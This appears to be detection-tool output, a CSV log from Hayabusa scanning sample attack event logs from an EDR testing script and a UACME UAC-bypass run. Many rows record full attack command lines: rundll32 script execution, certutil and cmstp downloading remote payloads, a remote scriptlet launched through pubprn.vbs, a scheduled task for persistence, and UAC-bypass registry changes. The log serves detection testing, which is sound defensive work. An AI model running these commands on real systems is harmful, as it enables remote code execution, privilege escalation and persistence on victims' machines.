747F3D96-6652-5D3F-0000-001058828C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:12.352 +00:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,rules/sigma/network_connection/net_connection_win_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.226 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.226 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.252 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.658 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.658 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:15.658 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.238 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.238 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.262 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.459 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:20.459 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:21.867 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:21.867 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.202 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.269 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.659 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:25.659 +00:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.237 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.258 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.685 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:30.807 +00:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.313 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.337 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.347 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.838 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.838 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.878 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:35.878 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.421 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.534 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.534 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:36.548 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.261 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.261 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.385 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.889 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.889 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:40.889 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:41.793 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.242 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.311 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.606 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:45.606 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 09:46:48.209 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.209 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.209 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.726 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.924 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.402 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.402 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.436 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.502 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | 